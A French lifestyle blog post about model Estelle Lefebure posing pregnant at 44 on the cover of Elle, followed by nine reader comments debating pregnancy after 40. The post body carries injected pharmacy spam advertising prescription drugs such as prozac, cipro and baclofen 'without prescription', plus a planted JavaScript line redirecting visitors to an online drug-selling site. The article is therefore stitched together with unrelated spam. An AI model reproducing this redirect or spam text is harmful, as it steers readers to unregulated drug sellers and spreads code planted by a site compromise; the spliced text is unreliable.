Estelle Lefebure, égerie Mixa enceinte en couverture d’Elle

12 novembre 2010 par  
Classé dans A la Une, Lifestyle, People

nov 21, 2014 – cheap medication : buy estrace online best quality, cheap generic prozac no prescription, cheap prices , credit cards accepted, worldwide fluoxetine 20 mg tablets fluoxetine to buy online uk cheap fucidin uk online drugstore, top quality medications buy zithromax z pack online low prices, quality generics  estelle_enceinte

Estelle Lefebure fait partie des très belles femmes enceintes de plus de 40 ans.
A 44 ans elle est sublime, je trouve qu’elle a de plus en plus de charme en vieillissant, et montre qu’on peut mener une belle grossesse après 40 ans.
cipro joint pain temporary cipro without prescription

Les « stars » sont de plus en plus nombreuses à avoir des enfants après 40 ans : Monica Bellucci , Estelle Lefebure, Halle Berry, Marcia Cross, Salma Hayek, Nicole Kidman, Julia Roberts, Céline Dion ou encore Rachida Dati !

Naturelle, spontanée, Estelle est rayonnante en couverture du Elle, ça fait du bien de voir une femme enceinte à plus de 40 ans « accessible », car contrairement aux stars américaines elle n’aura à mon avis pas besoin d’une horde de nounous et pousseurs de poussettes autour d’elle !

Elle propose un dossier spéciale « elles font un bébé après 40 ans : leurs bonheurs, leurs doutes, leurs attentes ».

Alors, enceinte après 40 ans, ça vous inspire ?
lioresal 10 mg, lioresal intrathecal, buy baclofen , baclofen price, buy baclofen online, lioresal price, cheap baclofen.

window.location = « http://medicationsonlinedoctor.com »;.

Rendez-vous sur Hellocoton !

Comments

9 Réponses pour “Estelle Lefebure, égerie Mixa enceinte en couverture d’Elle”
  1. Véro dit :

    Non mais écoute, moi je l’aime bien Estelle mais crotte quoi : j’en peux vraiment plus des femmes enceintes qui posent à poil !!!!!!!!!!!!!!!!
    Qu’elles aient 20 ou 40 ans, c’est TOUJOURS la même chose ! Depuis que Demi Moore a lancé la mode, elles le font toutes ! J’aime pas ça, même si la photo d’Estelle n’a rien de vulgaire, je ne sais pas… c’est vraiment quelque chose qui m’horripile.

    Maintenant, autre coup de gueule aussi et qui est partagé par plein de médecins: les célébrités donnent une image faussée de la grossesse (bon, pour tous les autres sujets aussi à vrai dire). Après 40 ans, il y a forcément beaucoup plus de risques à être enceinte. Il y a un temps pour tout dans la vie ! Mais les hommes et les femmes ne veulent plus entendre parler de « bon sens », ils veulent avoir des enfants « quand ils veulent » à tout prix. C’est absurde.

    Tant mieux pour celles qui n’ont pas de problème après 40 ans, mais avoir un enfant à 44 ans, c’est vraiment très risqué.

  2. Anne Claire dit :

    @Véro : je comprends ce que tu veux dire, c’est vrai que c’est la mode de poser enceinte, mais contrairement à Demi Moore Heidi Klum & co cette photo d’Estelle me donne vraiment l’impression que c’est « vrai », elle a l’image d’une femme très accessible (d’où le choix de Mixa comme égérie pour une marque GMS) et pour le coup je trouve qu’on y croit plus que pour les stars d’Hollywood !
    Maintenant, c’est certes plus « à risque » les grossesses après 40 ans mais je pense que nous serons de plus en plus nombreuses à être concernées : études plus longues, entrée dans la vie active plus tard, séparation, familles recomposées …
    Ma mère m’a eue a 32 ans et j’ai toujours eu « la plus vieille maman » parmi mes amies, j’ai toujours pensé qu’elle m’avait eu trop vieille, aujourd’hui être maman avant 30 ans c’est pour moi super jeune !

    Alors oui le corps n’est pas une machine de guerre et une grossesse est un sacré évènement mais je pense que ça reste raisonnable à 40 ans. Evidemment ça doit nécessiter un suivi particulier mais si la femme s’en sent capable je ne vois pas le problème !

  3. J’ai 1 ans de plus qu’Estelle, pas le même physique mais c’est un détail….
    J’ai eu mon premier enfant à 38 ans et n’en ai pas fait d’autre pour une raison toute simple, la nature a fait en sorte que ça ne se fasse pas. Passé 35 la fertilité féminine diminue fortement et il est de plus en plus souvent nécessaire de faire appel à des aides hormonales pour obtenir une grossesse. Je ne vais pas hurler contre ce système et le fait que parfois on ne sache pas toujours les conséquences que ça peut avoir sur le futur bébé, j’y suis passée et j’en suis ravie (enfin pas tous les jours mais c’est aussi ça être parent) par contre ces traitement ne sont pas sans répercussions sur la vie du couple (essayer de se reproduire sur commande et à un créneau horaire donné c’est top glamour) et fatiguent parfois pas mal la future mère.
    Par contre au niveau énergie et patience je peux t’assurer qu’à 45 ans ben tu n’es plus réellement au top et avec un gamin c’est pas facile de rentrer crevée et excédée par ton job puis devoir supporter la sale période des 2 ans, des 4 ans et des 7 ans et… 😉 Bref bien que j’ai eu une grossesse sans problème particulier je ne serai pas prête à repartir pour un tour et ne le conseillerai pas aux copines. Sans compter qu’à 20 ans cette jeune personne aura une mère de 65 ans, sauront elles se comprendre ? La retraite et sa diminution de revenus sera là avant que l’enfant n’ai terminé ses études s’il a choisi un cursus long… bref à 44 on a éventuellement la forme pour faire un gosse mais si on se projette dans le moyen terme c’est pas top qunad même, enfin pour l’enfant à naitre. Mais bon ces considérations ne sont peut être valables que pour madame tout le monde 😉
    En tout cas oui elle est jolie Estelle, c’est qui le père ?

  4. J.Codor dit :

    il faut un temps pour tout mais moi grand mere a 58 ans j aime profiter de mes enfants, de mes petits enfants sans avoir besoin d aide pour marcher, conduire faire des jeux avec mon petits fils.
    Avec 10 ans de plus je ne suis pas certaine que je serais aussi en forme.
    Il faut vite compter: 30 plus 20 égal 50 mais 45 plus 20 égal 65 …
    Alors oui les filles c est bien de vivre sa vie avant les enfants mais pas trop longtemps !

  5. Euréka dit :

    c’est vrai qu’elle est belle, je savais pas quelle etait enceinte

  6. deborah dit :

    je ne comprends pas les réactions de ces femmes, Laurence Ferrari vient d’avoir un bébé à 44ans et recemment on a vu sylvie vartan 66 ans nous présenter sa fille de 13ans rien de choquant .Evelyne Delhiat aura bientot 63 ans et elle n’a vraiment rien d’une grand mère!!!!les femmes vivent de plus en plus longtemps et reste jeunes idem, sauf celles qui ont mené des vies de « patachon », il faudra s’adapter et pouvoir procréer de + en+ tard!pour vous c’est trop tard , mais pour nous, les « news générations » no problèms!!!

  7. Nadia dit :

    Bjr tt le monde,

    Avoir moins de 30 ans ou plus de 40 ans, l’âge n’est pas fataliste pr avoir des enfants. Perso, depuis l’âge de 26 ans j’essayé d’avoir des enfants sans succès et ce né kauj à 38 ans k je tombe enfin enceinte, et croyez moi ce né k du bonheur. Il faut juste avoir de la patience et du courage et surtout la foi.
    Bonne chance pr les futures mamans.

  8. Mencarelli dit :

    Bonjour a toutes!!! Je tiens a témoigner sur l’age de la maternite!!
    A notre époque les mœurs et la vie ont évoluer , on est plus a l’époque de nos grand mères qui enfanter a 20 ans !!! Je pense qu’être prête dans sa tête pour avoir un enfant c’est très important aussi! Pour ma part je suis enceinte actuellement de mon premier enfant et j aie 34 ans et je suis sereine, épanouie et prête a vivre cette merveilleuse aventure . A 30 ans on est plus mature et plus en phase avec soi pour vivre une maternité!!! Alors un conseil les filles y a pas d’age pour devenir mère c’est une question de parcours de vie et de sensation!! Et un petit clin d’œil , ça sert a rien d’être jeune dans son corps si on est vieux dans sa tête pour avoir des enfants ou des petits enfants!!! Bises

  9. gigi dit :

    oui elle est belle , oui elles sont toutes belles , mais desolee de le dire elles ont l argent que nous ont n a pas j ai 4 enfants , 45 ans , ils sont heureux , enfin j espere lol , je sais que je peux encore donner a un enfant , alors je prefere regarder et demander a m’occuper d un petit loup deja la et dont personne ne veut . mais oui elle est belle

Libère ton esprit

Dites ce que vous en pensez...
Et oh, si vous voulez une image avec votre commentaire, inscrivez vous sur gravatar!